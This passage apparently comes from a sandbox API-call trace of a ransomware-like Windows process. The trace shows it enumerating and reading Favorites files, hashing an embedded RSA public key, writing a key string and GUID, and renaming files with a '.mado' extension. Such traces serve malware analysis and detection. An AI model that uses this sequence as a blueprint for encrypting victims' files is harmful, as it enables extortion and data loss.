lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.298] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.298] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.298] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.298] CloseHandle (hObject=0x63c) returned 1 [0205.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.299] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.mado")) returned 1 [0205.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.300] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.301] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0205.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.301] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0205.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.301] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.301] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.304] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.304] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.305] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.305] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.305] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.306] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.306] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.306] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.306] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.306] GetLastError () returned 0x0 [0205.306] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.306] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.306] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.306] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.306] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.306] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81548 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81590 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7a8 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.307] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7a8 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe778 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe760 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.308] GetCurrentThreadId () returned 0x600 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68bb8 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.308] GetCurrentThreadId () returned 0x600 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7a8 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7c0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81590 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.312] 